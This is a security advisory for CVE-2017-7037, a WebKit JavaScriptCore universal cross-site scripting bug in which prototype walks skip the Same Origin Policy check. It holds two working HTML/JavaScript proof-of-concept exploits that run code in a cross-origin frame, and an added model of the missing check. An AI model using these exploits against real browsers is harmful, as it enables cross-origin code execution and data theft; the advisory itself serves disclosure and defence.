WebKit JSC JSObject::putInlineSlow & JSValue::putToPrimitive UXSS

2017.07.25
Credit: lokihardt
Risk: High
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive
CVE-2017-7037

JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to obtain an object's prototype while walking the chain for a setter. JSDOMWindow::getPrototype, which enforces the Same Origin Policy, is therefore never called, and an assignment in one origin can reach a setter defined on a prototype belonging to another origin. The PoCs below call such a setter in a cross-origin (data: URL) frame; the setter stringifies the attacker-supplied value, and the attacker's toString uses the setter's Function constructor (arguments.callee.caller.constructor) to run code in that frame's origin.

PoC 1 - JSValue::putToPrimitive:

<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let loc = f.contentWindow.location;
f.onload = () => {
  // 1.2 is a primitive, so the assignment below takes JSValue::putToPrimitive.
  // Number.prototype's own prototype is pointed at the cross-origin window.
  let a = 1.2;
  a.__proto__.__proto__ = f.contentWindow;
  // The unchecked walk reaches the frame's Object.prototype setter for 'test'.
  // The setter does 'a' + v, which calls this toString with the setter as its
  // caller, so caller.constructor is the frame's Function.
  a['test'] = {toString: function () { arguments.callee.caller.constructor('alert(location)')(); }};
};
// The frame defines the setter. '</scrip' + 't>' keeps the outer HTML parser
// from ending this script element early.
f.src = 'data:text/html,' + `<iframe></iframe><script> Object.prototype.__defineSetter__('test', v => { 'a' + v; }); </scrip` + `t>`;
</script>
</body>

PoC 2 - JSObject::putInlineSlow:

<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let loc = f.contentWindow.location;
f.onload = () => {
  // An ordinary object whose prototype is the cross-origin window, so the
  // assignment takes JSObject::putInlineSlow and walks into the frame's
  // Object.prototype without the SOP check.
  let a = { __proto__: f.contentWindow };
  a['test'] = {toString: function () { arguments.callee.caller.constructor('alert(location)')(); }};
};
f.src = 'data:text/html,' + `<iframe></iframe><script> Object.prototype.__defineSetter__('test', v => { 'a' + v; }); </scrip` + `t>`;
</script>
</body>

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: lokihardt
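To make the root cause concrete, the following is an added example, not WebKit code and not part of lokihardt's report: a deliberately simplified JavaScript model of the prototype walk in the put() slow paths. ModelObject, ModelWindow, putSlow, runPoC and the origins used are made-up names for illustration. The only difference between the vulnerable and fixed walks is how the next prototype is obtained: the raw slot (getPrototypeDirect) versus the virtual hook (getPrototype), which for a window object yields null to a cross-origin caller, as the HTML spec's cross-origin [[GetPrototypeOf]] does. The model rebuilds the object graph of both PoCs and reports whether the cross-origin setter was reached.

```javascript
// Added example (not WebKit code): a simplified model of the prototype walk
// behind JSObject::putInlineSlow / JSValue::putToPrimitive. ModelObject,
// ModelWindow, putSlow and the origins are made-up names for illustration.

class ModelObject {
  constructor(proto, origin) {
    this.own = new Map();        // property name -> { value } or { setter }
    this.structureProto = proto; // the raw [[Prototype]] slot
    this.origin = origin;
  }
  // getPrototypeDirect: reads the slot, performs no check (what the bug used).
  getPrototypeDirect() {
    return this.structureProto;
  }
  // getPrototype: the virtual hook; plain objects add no check either.
  getPrototype(callerOrigin) {
    return this.structureProto;
  }
}

// Stands in for JSDOMWindow: a cross-origin caller gets null instead of the
// real prototype, matching the HTML spec's cross-origin [[GetPrototypeOf]].
class ModelWindow extends ModelObject {
  getPrototype(callerOrigin) {
    return callerOrigin === this.origin ? this.structureProto : null;
  }
}

function defineSetter(obj, name, fn) {
  obj.own.set(name, { setter: fn });
}

// Generic put slow path: walk the chain looking for a setter and call it if
// found; otherwise create an own data property on the receiver. `step` is how
// the walk moves to the next prototype, the one thing the fix changed.
function putSlow(receiver, name, value, callerOrigin, step) {
  for (let obj = receiver; obj !== null; obj = step(obj, callerOrigin)) {
    const slot = obj.own.get(name);
    if (slot && slot.setter) {
      slot.setter(value);
      return 'setter';
    }
    if (slot) break;             // a data property on the chain ends the search
  }
  receiver.own.set(name, { value });
  return 'own';
}

const stepDirect = (obj) => obj.getPrototypeDirect();           // vulnerable
const stepChecked = (obj, caller) => obj.getPrototype(caller);  // fixed

// Rebuild the PoC object graph. 'putToPrimitive' mirrors PoC 1 (Number.prototype's
// prototype is the frame window; the receiver stands in for the primitive's
// temporary wrapper); 'putInlineSlow' mirrors PoC 2 ({ __proto__: f.contentWindow }).
function runPoC(variant, step) {
  const attacker = 'https://attacker.example'; // assumed origin of the outer page
  const victim = 'null';                       // a data: frame has an opaque origin
  const setterCalls = [];

  const victimObjectProto = new ModelObject(null, victim);
  defineSetter(victimObjectProto, 'test', (v) => setterCalls.push(v)); // __defineSetter__ in the frame
  const victimWindow = new ModelWindow(victimObjectProto, victim);

  let receiver;
  if (variant === 'putToPrimitive') {
    const numberProto = new ModelObject(victimWindow, attacker);
    receiver = new ModelObject(numberProto, attacker);
  } else {
    receiver = new ModelObject(victimWindow, attacker);
  }

  const outcome = putSlow(receiver, 'test', 'payload', attacker, step);
  return { outcome, setterCalls: setterCalls.length };
}

for (const variant of ['putToPrimitive', 'putInlineSlow']) {
  console.log(variant, 'direct:', runPoC(variant, stepDirect), 'checked:', runPoC(variant, stepChecked));
}
```

With stepDirect both variants return outcome 'setter' with one setter call, which is the cross-origin setter invocation the PoCs turn into code execution; with stepChecked the walk stops at the window and the property simply becomes an own property of the receiver. The model ignores everything else the real slow paths do (structure transitions, read-only checks, exception handling), so read it as a sketch of the check that was missing rather than a description of the patch.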



Copyright 2017, cxsecurity.com
